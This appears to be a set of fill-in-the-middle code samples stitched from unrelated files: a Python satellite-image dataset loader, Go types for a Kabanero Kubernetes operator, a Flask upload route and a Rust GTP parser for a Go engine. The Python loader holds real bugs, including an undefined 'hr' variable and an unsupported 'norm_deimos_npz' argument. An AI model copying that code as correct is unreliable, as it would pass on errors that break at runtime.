return [i for i, ts in enumerate(timestamps) if ts >= start_date and ts < end_date]
def read_imageset_eopatch(imset_file: str,
start_date: datetime,
end_date: datetime,
country: str,
filesystem: S3FS = None,
normalize: bool = True,
country_norm_df: pd.DataFrame = None,
norm_s2_npz: np.lib.npyio.NpzFile = None,
n_views: int = 16,
padding: str = 'zeros', histogram_matching: bool = False) -> ImageSet:
"""
Retrieves all assets from the given directory.
:param imset_file: name of npz file with sample imageset
:param filesystem: S3 filesystem to read files directly from bucket. Default reads from local disk
:param start_date: specifies the start of the temporal range of the stack of images used for prediction
:param end_date: specifies the end of the temporal range of the stack of images used for prediction
:param country: specifies the name of the country so it can be matched with the country_norm_df
:param normalize: whether to normalize data or not
:param country_norm_df: S2 median/std normalization factors stored per country
:param norm_s2_npz: 1st and 99th percentile normalization factors for S2
:param n_views: number of time frames to consider in lrs sequence. If n_views is smaller than the available time
                    frames, `n_views` timeframes from the lrs sequence are taken in reverse order, i.e. last is first
:param padding: strategy used to fill lrs sequence if n_views is greater than available timestamps. Supported
options are `zeros`, where 0 frames are prepended to features, or `repeat` where random repeats of
timeframes are taken
"""
assert padding in ['zeros', 'repeat']
eopatch = EOPatch.load(imset_file, filesystem=filesystem, lazy_loading=True)
noncloudy = filter_cloudy_s2(eopatch, max_cc=0.1)
ts_idxs = timestamps_within_date(noncloudy.timestamp, start_date, end_date)
features = noncloudy.data['BANDS'][ts_idxs, ...] / 10000
filtered_ts = [eopatch.timestamp[tsi] for tsi in ts_idxs]
if normalize:
country_stats = country_norm_df[country_norm_df.country == str(country)]
norm_median = country_stats[['median_0', 'median_1', 'median_2', 'median_3']].values
norm_std = country_stats[['std_0', 'std_1', 'std_2', 'std_3']].values
features = (features - norm_median) / norm_std
s2_p1 = norm_s2_npz['p1']
s2_p99 = norm_s2_npz['p99']
features = (features - s2_p1) / (s2_p99 - s2_p1)
alphas = np.ones(n_views)
if histogram_matching:
hr = match_histograms(hr, features[-1], multichannel=True)
n_feature_timestamps = len(features)
if n_feature_timestamps < n_views:
if padding == 'zeros':
features = pad_to_k(features, n_views, pad_to_front=False)
alphas[n_feature_timestamps:] = 0
elif padding == 'repeat':
n_pad = n_views - n_feature_timestamps
padded = features[-1:].repeat(n_pad, axis=0)
features = np.concatenate((features, padded))
else:
features = features[-n_views:, ...]
# Tensor is `CxTxHxW`
features = np.moveaxis(features, -1, 0)
imageset = ImageSet(name=os.path.basename(imset_file),
lr=features,
alphas=alphas,
ts=filtered_ts[::-1])
return imageset
class EopatchPredictionDataset(Dataset):
""" Derived Dataset class for loading many imagesets from a list of directories.
:param imset_dir: name of directory containing files
:param imset_npz_files: list of filenames that constitute the dataset
:param time_first: whether returned lrs sequence should have time dimension first or channels. Use `time_first=True`
                       if you are training the HRN model (`BxTxCxHxW`), `time_first=False` if you are training RAMS
                       (`BxCxTxHxW`)
:param filesystem: S3 filesystem to read files directly from bucket. Default reads from local disk
:param start_date: specifies the start of the temporal range of the stack of images used for prediction
:param end_date: specifies the end of the temporal range of the stack of images used for prediction
:param country: specifies the name of the country so it can be matched with the country_norm_df
:param normalize: whether to normalize data or not
:param country_norm_df: S2 median/std normalization factors stored per country
:param norm_deimos_npz: 1st and 99th percentile normalization factors for DEIMOS
:param norm_s2_npz: 1st and 99th percentile normalization factors for S2
:param channels_feats: which channels (i.e. indices) are extracted from lrs sequence
:param channels_labels: which channels (i.e. indices) are extracted from hr image
:param n_views: number of time frames to consider in lrs sequence. If n_views is smaller than the available time
                    frames, `n_views` timeframes from the lrs sequence are taken in reverse order, i.e. last is first
:param padding: strategy used to fill lrs sequence if n_views is greater than available timestamps. Supported
options are `zeros`, where 0 frames are appended to features, or `repeat` where random repeats of
timeframes are taken
:param transform: function executed on lr and hr arrays as augmentation
"""
def __init__(
self,
imset_dir: str,
imset_npz_files: list,
time_first: bool,
start_date: datetime,
end_date: datetime,
country: str,
filesystem: object = None,
normalize: bool = True,
country_norm_df: object = None,
norm_deimos_npz: np.ndarray = None,
norm_s2_npz: np.ndarray = None,
channels_feats: List[int] = [0, 1, 2, 3],
n_views: int = 16,
padding: str = 'zeros',
histogram_matching: bool = False
):
super().__init__()
self.imset_dir = imset_dir
self.filesystem = filesystem
self.imset_npz_files = imset_npz_files
self.time_first = time_first
self.normalize = normalize
self.country_norm_df = country_norm_df
self.norm_deimos_npz = norm_deimos_npz
self.norm_s2_npz = norm_s2_npz
self.channels_feats = channels_feats
self.n_views = n_views
self.padding = padding
self.start_date = start_date
self.end_date = end_date
self.histogram_matching = histogram_matching
self.country = country
def __len__(self):
return len(self.imset_npz_files)
def __getitem__(self, index: int) -> ImageSet:
""" Returns an ImageSet dict of all assets in the directory of the given index."""
if isinstance(index, int):
imset_file = os.path.join(self.imset_dir, self.imset_npz_files[index])
else:
raise KeyError('Index must be of type `int`.')
imset = read_imageset_eopatch(
imset_file=imset_file,
filesystem=self.filesystem,
normalize=self.normalize,
country_norm_df=self.country_norm_df,
norm_deimos_npz=self.norm_deimos_npz,
norm_s2_npz=self.norm_s2_npz,
n_views=self.n_views,
padding=self.padding,
start_date=self.start_date,
end_date=self.end_date,
country=self.country,
histogram_matching=self.histogram_matching,
)
lr = imset['lr'][self.channels_feats]
if self.time_first:
lr = np.swapaxes(lr, 0, 1)
imset['lr'] = torch.from_numpy(lr.copy())
imset['alphas'] = torch.from_numpy(imset['alphas'])
return imset
| __repr__ |
kabanero_types.go | package v1alpha1
import (
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
// EDIT THIS FILE! THIS IS SCAFFOLDING FOR YOU TO OWN!
// NOTE: json tags are required. Any new fields you add must have json tags for the fields to be serialized.
// NOTE: The +listType=set marker is required by OpenAPI generation for list types.
// +kubebuilder:subresource:status
// KabaneroSpec defines the desired state of Kabanero
// +k8s:openapi-gen=true
type KabaneroSpec struct {
// INSERT ADDITIONAL SPEC FIELDS - desired state of cluster
// Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file
// Add custom validation using kubebuilder tags: https://book.kubebuilder.io/beyond_basics/generating_crd.html
Version string `json:"version,omitempty"`
// +listType=set
TargetNamespaces []string `json:"targetNamespaces,omitempty"`
Github GithubConfig `json:"github,omitempty"`
Collections InstanceCollectionConfig `json:"collections,omitempty"`
Tekton TektonCustomizationSpec `json:"tekton,omitempty"`
CliServices KabaneroCliServicesCustomizationSpec `json:"cliServices,omitempty"`
Landing KabaneroLandingCustomizationSpec `json:"landing,omitempty"`
Che CheCustomizationSpec `json:"che,omitempty"`
Events EventsCustomizationSpec `json:"events,omitempty"`
CollectionController CollectionControllerSpec `json:"collectionController,omitempty"`
AdmissionControllerWebhook AdmissionControllerWebhookCustomizationSpec `json:"admissionControllerWebhook,omitempty"`
}
// InstanceCollectionConfig defines the customization entries for a set of collections.
type InstanceCollectionConfig struct {
// +listType=map
// +listMapKey=url
Repositories []RepositoryConfig `json:"repositories,omitempty"`
}
// GithubConfig represents the Github information (public or GHE) where
// the organization and teams managing the collections live. Members
// of the specified team in the specified organization will have admin
// authority in the Kabanero CLI.
type GithubConfig struct {
Organization string `json:"organization,omitempty"`
// +listType=set
Teams []string `json:"teams,omitempty"`
ApiUrl string `json:"apiUrl,omitempty"`
}
// RepositoryConfig defines customization entries for a collection.
type RepositoryConfig struct {
Name string `json:"name,omitempty"`
Url string `json:"url,omitempty"`
ActivateDefaultCollections bool `json:"activateDefaultCollections,omitempty"`
SkipCertVerification bool `json:"skipCertVerification,omitempty"`
}
// TektonCustomizationSpec defines customization entries for Tekton
type TektonCustomizationSpec struct {
Disabled bool `json:"disabled,omitempty"`
Version string `json:"version,omitempty"`
}
// KabaneroCliServicesCustomizationSpec defines customization entries for the Kabanero CLI.
type KabaneroCliServicesCustomizationSpec struct {
//Future: Enable bool `json:"enable,omitempty"`
Version string `json:"version,omitempty"`
Image string `json:"image,omitempty"`
Repository string `json:"repository,omitempty"`
Tag string `json:"tag,omitempty"`
SessionExpirationSeconds string `json:"sessionExpirationSeconds,omitempty"`
}
// KabaneroLandingCustomizationSpec defines customization entries for Kabanero landing page.
type KabaneroLandingCustomizationSpec struct {
Enable *bool `json:"enable,omitempty"`
Version string `json:"version,omitempty"`
}
// CheCustomizationSpec defines customization entries for Che.
type CheCustomizationSpec struct {
Enable *bool `json:"enable,omitempty"`
CheOperatorInstance CheOperatorInstanceSpec `json:"cheOperatorInstance,omitempty"`
KabaneroChe KabaneroCheSpec `json:"kabaneroChe,omitempty"`
}
// CheOperatorInstanceSpec defines customization entries for the Che operator instance.
type CheOperatorInstanceSpec struct {
CheWorkspaceClusterRole string `json:"cheWorkspaceClusterRole,omitempty"`
}
// KabaneroCheSpec defines customization entries for Kabanero Che.
type KabaneroCheSpec struct {
Version string `json:"version,omitempty"`
Image string `json:"image,omitempty"`
Repository string `json:"repository,omitempty"`
Tag string `json:"tag,omitempty"`
}
type EventsCustomizationSpec struct {
Enable bool `json:"enable,omitempty"`
Version string `json:"version,omitempty"`
Image string `json:"image,omitempty"`
Repository string `json:"repository,omitempty"`
Tag string `json:"tag,omitempty"`
}
// CollectionControllerSpec defines customization entries for the Kabanero collection controller.
type CollectionControllerSpec struct {
Version string `json:"version,omitempty"`
Image string `json:"image,omitempty"`
Repository string `json:"repository,omitempty"`
Tag string `json:"tag,omitempty"`
}
type AdmissionControllerWebhookCustomizationSpec struct {
Version string `json:"version,omitempty"`
Image string `json:"image,omitempty"`
Repository string `json:"repository,omitempty"`
Tag string `json:"tag,omitempty"`
}
// KabaneroStatus defines the observed state of the Kabanero instance.
// +k8s:openapi-gen=true
type KabaneroStatus struct {
// Kabanero operator instance readiness status. The status is directly correlated to the availability of resources dependencies.
KabaneroInstance KabaneroInstanceStatus `json:"kabaneroInstance,omitempty"`
// Knative eventing instance readiness status.
KnativeEventing KnativeEventingStatus `json:"knativeEventing,omitempty"`
// OpenShift serverless operator status.
Serverless ServerlessStatus `json:"serverless,omitempty"`
// Tekton instance readiness status.
Tekton TektonStatus `json:"tekton,omitempty"`
// CLI readiness status.
Cli CliStatus `json:"cli,omitempty"`
// Kabanero Landing page readiness status.
Landing *KabaneroLandingPageStatus `json:"landing,omitempty"`
// Appsody instance readiness status.
Appsody AppsodyStatus `json:"appsody,omitempty"`
// Kabanero Application Navigator instance readiness status.
Kappnav *KappnavStatus `json:"kappnav,omitempty"`
// Che instance readiness status.
Che *CheStatus `json:"che,omitempty"`
// Events instance status
Events *EventsStatus `json:"events,omitempty"`
// Kabanero collection controller readiness status.
CollectionController CollectionControllerStatus `json:"collectionController,omitempty"`
// Admission webhook instance status
AdmissionControllerWebhook AdmissionControllerWebhookStatus `json:"admissionControllerWebhook,omitempty"`
}
// KabaneroInstanceStatus defines the observed status details of Kabanero operator instance
type KabaneroInstanceStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// TektonStatus defines the observed status details of Tekton.
type TektonStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// KnativeEventingStatus defines the observed status details of Knative Eventing.
type KnativeEventingStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// ServerlessStatus defines the observed status details of OpenShift serverless.
type ServerlessStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
KnativeServing KnativeServingStatus `json:"knativeServing,omitempty"`
}
// KnativeServingStatus defines the observed status details of Knative Serving.
type KnativeServingStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// CliStatus defines the observed status details of the Kabanero CLI.
type CliStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
// +listType=set
Hostnames []string `json:"hostnames,omitempty"`
}
// KabaneroLandingPageStatus defines the observed status details of the Kabanero landing page.
type KabaneroLandingPageStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// AppsodyStatus defines the observed status details of Appsody.
type AppsodyStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// KappnavStatus defines the observed status details of Kubernetes Application Navigator.
type KappnavStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
// +listType=set
UiLocations []string `json:"uiLocations,omitempty"`
// +listType=set
ApiLocations []string `json:"apiLocations,omitempty"`
}
// CheStatus defines the observed status details of Che.
type CheStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
CheOperator CheOperatorStatus `json:"cheOperator,omitempty"`
KabaneroChe KabaneroCheStatus `json:"kabaneroChe,omitempty"`
KabaneroCheInstance KabaneroCheInstanceStatus `json:"kabaneroCheInstance,omitempty"`
}
// CheOperatorStatus defines the observed status details of the Che operator.
type CheOperatorStatus struct {
Version string `json:"version,omitempty"`
}
// KabaneroCheStatus defines the observed status details of Kabanero Che.
type KabaneroCheStatus struct {
Version string `json:"version,omitempty"`
}
// KabaneroCheInstanceStatus defines the observed status details of Che instance.
type KabaneroCheInstanceStatus struct {
CheImage string `json:"cheImage,omitempty"`
CheImageTag string `json:"cheImageTag,omitempty"`
CheWorkspaceClusterRole string `json:"cheWorkspaceClusterRole,omitempty"`
}
// EventsStatus defines the observed status details of the Kabanero events.
type EventsStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
// +listType=set
Hostnames []string `json:"hostnames,omitempty"`
}
// CollectionControllerStatus defines the observed status details of the Kabanero collection controller.
type CollectionControllerStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// AdmissionControllerWebhookStatus defines the observed status details of the Kabanero mutating and validating admission webhooks.
type AdmissionControllerWebhookStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
}
// Kabanero is the Schema for the kabaneros API
// Note that kubebuilder and operator-sdk currently disagree about what the
// plural of this type should be. The +kubebuilder:resource marker sets the
// plural to what operator-sdk expects.
// +k8s:openapi-gen=true
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// +kubebuilder:subresource:status
// +kubebuilder:printcolumn:name="Age",type="date",JSONPath=".metadata.creationTimestamp",description="CreationTimestamp is a timestamp representing the server time when this object was created. It is not guaranteed to be set in happens-before order across separate operations."
// +kubebuilder:printcolumn:name="Version",type="string",JSONPath=".status.kabaneroInstance.version",description="Kabanero operator instance version."
// +kubebuilder:printcolumn:name="Ready",type="string",JSONPath=".status.kabaneroInstance.ready",description="Kabanero operator instance readiness status. The status is directly correlated to the availability of the operator's resources dependencies."
// +kubebuilder:resource:path=kabaneros,scope=Namespaced
// +kubebuilder:unservedversion
type Kabanero struct {
metav1.TypeMeta `json:",inline"`
metav1.ObjectMeta `json:"metadata,omitempty"`
Spec KabaneroSpec `json:"spec,omitempty"`
Status KabaneroStatus `json:"status,omitempty"`
}
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// KabaneroList contains a list of Kabanero
type KabaneroList struct {
metav1.TypeMeta `json:",inline"`
metav1.ListMeta `json:"metadata,omitempty"`
// +listType=set
Items []Kabanero `json:"items"`
}
func | () {
SchemeBuilder.Register(&Kabanero{}, &KabaneroList{})
}
| init |
main.py | from flask import Flask, session, request
app = Flask(__name__)
@app.route('/upload', methods=['GET', 'POST'])
def hello_world():
| if request.method == 'POST':
session['audio_data'] = request.form['audio_data']
print(session['audio_data'])
# abc = vars(request)
# for i in abc:
# print(i)
return "Uploaded Audio"
return 'Hello, World!' |
|
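The `session` object used above only works once the app has a secret key configured, because Flask signs the session cookie with it; a minimal sketch with a placeholder value:

    app = Flask(__name__)
    app.secret_key = 'change-me'  # placeholder; required before session['audio_data'] can be stored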
mod.rs | // Copyright 2019 Karl Sundequist Blomdahl <[email protected]>
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use regex::Regex;
use std::env;
use std::fs::File;
use std::io::{BufRead, BufReader, Read};
use std::time::Instant;
use dg_go::utils::score::{Score, StoneStatus};
use dg_go::utils::sgf::Sgf;
use dg_go::{DEFAULT_KOMI, Board, Color, Point};
use dg_mcts::time_control::{TimeStrategy, RolloutLimit, ByoYomi};
use dg_mcts as mcts;
use dg_utils::config;
mod ponder_service;
mod time_settings;
mod vertex;
use self::vertex::*;
use self::ponder_service::PonderService;
use dg_mcts::options::{SearchOptions, ScoringSearch, StandardSearch};
use dg_mcts::tree::GreedyPath;
/// List containing all implemented commands, this is used to implement
/// the `list_commands` and `known_command` commands.
const KNOWN_COMMANDS: [&str; 24] = [
"protocol_version", "name", "version", "gomill-describe_engine", "gomill-cpu_time",
"boardsize", "clear_board", "komi", "play",
"list_commands", "known_command", "showboard", "genmove", "reg_genmove",
"kgs-genmove_cleanup", "gomill-explain_last_move", "undo",
"time_settings", "kgs-time_settings", "time_left", "quit",
"final_score", "final_status_list", "loadsgf"
];
#[derive(Clone, Debug, PartialEq)]
enum GenMoveMode {
Normal,
CleanUp,
Regression
}
impl GenMoveMode {
fn is_cleanup(&self) -> bool {
*self == GenMoveMode::CleanUp
}
fn is_regression(&self) -> bool {
*self == GenMoveMode::Regression
}
fn search_strategy(&self) -> Box<dyn SearchOptions + Sync> {
if self.is_cleanup() {
Box::new(ScoringSearch::default())
} else {
Box::new(StandardSearch::default())
}
}
}
#[derive(Debug, PartialEq)]
enum Command {
Pass, // do nothing
ProtocolVersion, // report protocol version
Name, // report the name of the program
Version, // report the version number of the program
BoardSize(usize), // set the board size to NxN
ClearBoard, // clear the board
CpuTime, // write the number of (cpu) seconds spent thinking
DescribeEngine, // write a description of the engine
ExplainLastMove, // write a description of why the last move was played
Komi(f32), // set the komi
Play(Color, Option<Point>), // play a stone of the given color at the given vertex
ListCommands, // list all available commands
KnownCommand(String), // tell whether a command is known
ShowBoard, // write the position to stdout
GenMove(Color, GenMoveMode), // generate and play the supposedly best move for either color
FinalScore, // write the score to stdout
FinalStatusList(StoneStatus), // write status of stones to stdout
LoadSgf(String, usize), // load SGF file
Undo, // undo one move
TimeSettingsNone, // set the time settings
TimeSettingsAbsolute(f32), // set the time settings
TimeSettingsCanadian(f32, f32, usize), // set the time settings
TimeSettingsByoYomi(f32, f32, usize), // set the time settings
TimeLeft(Color, f32, usize), // set the remaining time for the given color
Quit // quit
}
macro_rules! success {
($id:expr, $message:expr) => ({
match $id {
None => println!("= {}\n", $message),
Some(id) => println!("={} {}\n", id, $message)
}
})
}
macro_rules! error {
($id:expr, $message:expr) => ({
match $id {
None => println!("? {}\n", $message),
Some(id) => println!("?{} {}\n", id, $message)
}
})
}
lazy_static! {
static ref ID_PREFIX: Regex = Regex::new(r"^([0-9]+)(?: +(.*)$|$)").unwrap();
static ref BOARD_SIZE: Regex = Regex::new(r"^boardsize +([0-9]+)").unwrap();
static ref KOMI: Regex = Regex::new(r"^komi +(-?[0-9\.]+)").unwrap();
static ref PLAY: Regex = Regex::new(r"^play +([bBwW]) +([a-z][0-9]+|pass)").unwrap();
static ref KNOWN_COMMAND: Regex = Regex::new(r"^known_command +([^ ]+)").unwrap();
static ref GENMOVE: Regex = Regex::new(r"^genmove +([bw])").unwrap();
static ref REG_GENMOVE: Regex = Regex::new(r"^reg_genmove +([bw])").unwrap();
static ref KGS_GENMOVE_CLEANUP: Regex = Regex::new(r"^kgs-genmove_cleanup +([bw])").unwrap();
static ref FINAL_STATUS_LIST: Regex = Regex::new(r"^final_status_list +(dead|alive|seki|black_territory|white_territory)").unwrap();
static ref LOADSGF: Regex = Regex::new(r"^loadsgf +([^ ]+) *([0-9]+)?").unwrap();
static ref TIME_SETTINGS: Regex = Regex::new(r"^time_settings +([0-9]+\.?[0-9]*) +([0-9]+\.?[0-9]*) +([0-9]+)").unwrap();
static ref KGS_TIME_SETTINGS_NONE: Regex = Regex::new(r"^kgs-time_settings +none").unwrap();
static ref KGS_TIME_SETTINGS_ABSOLUTE: Regex = Regex::new(r"^kgs-time_settings +absolute +([0-9]+\.?[0-9]*)").unwrap();
static ref KGS_TIME_SETTINGS_BYOYOMI: Regex = Regex::new(r"^kgs-time_settings +byoyomi +([0-9]+\.?[0-9]*) +([0-9]+\.?[0-9]*) +([0-9]+)").unwrap();
static ref KGS_TIME_SETTINGS_CANADIAN: Regex = Regex::new(r"^kgs-time_settings +canadian +([0-9]+\.?[0-9]*) +([0-9]+\.?[0-9]*) +([0-9]+)").unwrap();
static ref TIME_LEFT: Regex = Regex::new(r"^time_left +([bBwW]) +([0-9]+\.?[0-9]*) +([0-9]+)").unwrap();
}
struct Gtp {
ponder: PonderService,
history: Vec<Board>,
komi: f32,
time_settings: [Box<dyn time_settings::TimeSettings>; 3],
explain_last_move: String,
finished_board: Option<Result<Board, &'static str>>
}
impl Gtp {
/// Parse the GTP command in the given string and returns our internal
/// representation of the given command.
///
/// # Arguments
///
/// * `id` -
/// * `line` -
///
fn parse_command(id: Option<usize>, line: &str) -> Result<(Option<usize>, Command), &str> {
let line = &line.to_lowercase();
if line == "protocol_version" {
Ok((id, Command::ProtocolVersion))
} else if line == "name" {
Ok((id, Command::Name))
} else if line == "version" {
Ok((id, Command::Version))
} else if let Some(caps) = BOARD_SIZE.captures(line) {
let size = caps[1].parse::<usize>().map_err(|_| "syntax error")?;
Ok((id, Command::BoardSize(size)))
} else if line == "clear_board" {
Ok((id, Command::ClearBoard))
} else if let Some(caps) = KOMI.captures(line) {
let komi = caps[1].parse::<f32>().map_err(|_| "syntax error")?;
Ok((id, Command::Komi(komi)))
} else if let Some(caps) = PLAY.captures(line) {
let color = caps[1].parse::<Color>().map_err(|_| "syntax error")?;
let vertex = caps[2].parse::<Vertex>().map_err(|_| "syntax error")?;
if vertex.is_pass() {
Ok((id, Command::Play(color, None)))
} else {
Ok((id, Command::Play(color, Some(Point::new(vertex.x, vertex.y)))))
}
} else if line == "list_commands" {
Ok((id, Command::ListCommands))
} else if let Some(caps) = KNOWN_COMMAND.captures(line) {
let command = &caps[1];
Ok((id, Command::KnownCommand(command.to_string())))
} else if line == "showboard" {
Ok((id, Command::ShowBoard))
} else if let Some(caps) = GENMOVE.captures(line) {
let color = caps[1].parse::<Color>().map_err(|_| "syntax error")?;
Ok((id, Command::GenMove(color, if *config::TROMP_TAYLOR { GenMoveMode::CleanUp } else { GenMoveMode::Normal })))
} else if line == "final_score" {
Ok((id, Command::FinalScore))
} else if let Some(caps) = FINAL_STATUS_LIST.captures(line) {
let status = caps[1].parse::<StoneStatus>().map_err(|_| "syntax error")?;
Ok((id, Command::FinalStatusList(status)))
} else if let Some(caps) = REG_GENMOVE.captures(line) {
let color = caps[1].parse::<Color>().map_err(|_| "syntax error")?;
Ok((id, Command::GenMove(color, GenMoveMode::Regression)))
} else if let Some(caps) = KGS_GENMOVE_CLEANUP.captures(line) {
let color = caps[1].parse::<Color>().map_err(|_| "syntax error")?;
Ok((id, Command::GenMove(color, GenMoveMode::CleanUp)))
} else if line == "undo" {
Ok((id, Command::Undo))
} else if let Some(caps) = LOADSGF.captures(line) {
let filename = caps[1].to_string();
let move_number = if let Some(move_number) = caps.get(2) {
move_number.as_str().parse::<usize>().map_err(|_| "syntax error")?
} else {
::std::usize::MAX
};
Ok((id, Command::LoadSgf(filename, move_number)))
} else if let Some(caps) = TIME_SETTINGS.captures(line) {
let main_time = caps[1].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_time = caps[2].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_stones = caps[3].parse::<usize>().map_err(|_| "syntax error")?;
if byo_yomi_time > 0.0 && byo_yomi_stones == 0 {
                // byo-yomi time with zero stones per period is never consumed, so treat it as no time limit
Ok((id, Command::TimeSettingsNone))
} else if byo_yomi_time == 0.0 {
// this is effectively absolute time since we gain no extra
// time.
Ok((id, Command::TimeSettingsAbsolute(main_time)))
} else {
Ok((id, Command::TimeSettingsCanadian(main_time, byo_yomi_time, byo_yomi_stones)))
}
} else if let Some(_caps) = KGS_TIME_SETTINGS_NONE.captures(line) {
Ok((id, Command::TimeSettingsNone))
} else if let Some(caps) = KGS_TIME_SETTINGS_ABSOLUTE.captures(line) {
let main_time = caps[1].parse::<f32>().map_err(|_| "syntax error")?;
Ok((id, Command::TimeSettingsAbsolute(main_time)))
} else if let Some(caps) = KGS_TIME_SETTINGS_BYOYOMI.captures(line) {
let main_time = caps[1].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_time = caps[2].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_stones = caps[3].parse::<usize>().map_err(|_| "syntax error")?;
Ok((id, Command::TimeSettingsByoYomi(main_time, byo_yomi_time, byo_yomi_stones)))
} else if let Some(caps) = KGS_TIME_SETTINGS_CANADIAN.captures(line) {
let main_time = caps[1].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_time = caps[2].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_stones = caps[3].parse::<usize>().map_err(|_| "syntax error")?;
if byo_yomi_stones > 0 {
Ok((id, Command::TimeSettingsCanadian(main_time, byo_yomi_time, byo_yomi_stones)))
} else {
Err("syntax error")
}
} else if let Some(caps) = TIME_LEFT.captures(line) {
let color = caps[1].parse::<Color>().map_err(|_| "syntax error")?;
let main_time = caps[2].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_stones = caps[3].parse::<usize>().map_err(|_| "syntax error")?;
Ok((id, Command::TimeLeft(color, main_time, byo_yomi_stones)))
} else if line == "gomill-cpu_time" {
Ok((id, Command::CpuTime))
} else if line == "gomill-describe_engine" {
Ok((id, Command::DescribeEngine))
} else if line == "gomill-explain_last_move" {
Ok((id, Command::ExplainLastMove))
} else if line == "quit" {
Ok((id, Command::Quit))
} else {
error!(id, "unknown command");
Ok((None, Command::Pass))
}
}
/// Parse the GTP command in the given string and returns our internal
/// representation of the given command.
///
/// # Arguments
///
/// * `line` -
///
fn parse_line(line: &str) -> Option<(Option<usize>, Command)> {
let line = line.trim();
let line = {
if let Some(pos) = line.find('#') {
line[0..pos].to_string()
} else {
line.to_string()
}
};
if line.is_empty() {
Some((None, Command::Pass))
} else if let Some(caps) = ID_PREFIX.captures(&line) {
let id = caps[1].parse::<usize>().unwrap();
let rest = &caps[2];
match Gtp::parse_command(Some(id), rest.trim()) {
Ok(result) => Some(result),
Err(reason) => {
error!(Some(id), reason);
Some((None, Command::Pass))
}
}
} else {
match Gtp::parse_command(None, &line) {
Ok(result) => Some(result),
Err(reason) => {
error!(None as Option<usize>, reason);
Some((None, Command::Pass))
}
}
}
}
/// Generate a move using the monte carlo tree search engine for the given
/// color, using the stored search tree if available.
///
/// If the given `color` is not the players whose turn it is according to the
/// search tree then the tree is fast-forwarded until it is that players turn.
///
/// # Arguments
///
/// * `id` - the identifier of the command
/// * `to_move` - the color to generate the move for
/// * `mode` - determine whether this is a clean-up move
///
fn generate_move(&mut self, id: Option<usize>, to_move: Color, mode: &GenMoveMode) -> Option<Point> {
let (main_time, byo_yomi_time, byo_yomi_periods) = self.time_settings[to_move as usize].remaining();
let board = self.history.last().unwrap();
let result = self.ponder.service(|service, search_tree, p_state| {
let search_tree = if search_tree.to_move != to_move {
// passing moves are not recorded in GTP, so we will just assume
// the other player passed once if we are in this situation
mcts::tree::Node::forward(search_tree, 361)
} else {
Some(search_tree)
};
let search_options: Box<dyn TimeStrategy + Sync> =
if main_time.is_finite() && byo_yomi_time.is_finite() {
let total_visits = search_tree.as_ref()
.map(|tree| tree.total_count)
.unwrap_or(0);
Box::new(ByoYomi::new(board.count(), total_visits, main_time, byo_yomi_time, byo_yomi_periods))
} else {
Box::new(RolloutLimit::new((*config::NUM_ROLLOUT).into()))
};
let result = mcts::predict(
service,
mode.search_strategy(),
search_options,
search_tree,
&board,
to_move
);
if result.is_none() {
return (None, None, p_state)
}
// disqualify the `pass` move, and any move that is not in contested territory, if
// we are doing clean-up and the board is not scorable.
let (value, index, mut tree) = result.unwrap();
let (value, index) = if mode.is_cleanup() && index == 361 && !board.is_scorable() {
tree.disqualify(361);
for &index in &board.get_scorable_territory() {
tree.disqualify(index.to_packed_index());
}
tree.best(0.0)
} else {
(value, index)
};
let explain_last_move = mcts::tree::to_pretty(&tree).to_string();
eprintln!("{}", explain_last_move);
let should_resign = !*config::NO_RESIGN && value.is_finite() && value < 0.1; // 10% chance of winning
let index = if should_resign { 361 } else { index };
let (vertex, tree, other) = if index >= 361 { // passing move
(None, mcts::tree::Node::forward(tree, 361), board.clone())
} else {
let at_point = Point::from_packed_parts(index);
let mut other = board.clone();
other.place(to_move, at_point);
(Some(at_point), mcts::tree::Node::forward(tree, index), other)
};
(Some((vertex, should_resign, explain_last_move)), tree, (other, to_move.opposite()))
});
if let Ok(Some((point, should_resign, explain_last_move))) = result {
self.explain_last_move = explain_last_move;
self.finished_board = None;
if should_resign {
success!(id, "resign");
None
} else if let Some(point) = point { // passing move
success!(id, &format!("{}", Vertex::from(point)));
Some(point)
} else {
success!(id, "pass");
None
}
} else if let Ok(None) = result {
error!(id, "unrecognized error");
None
} else {
error!(id, result.err().unwrap());
None
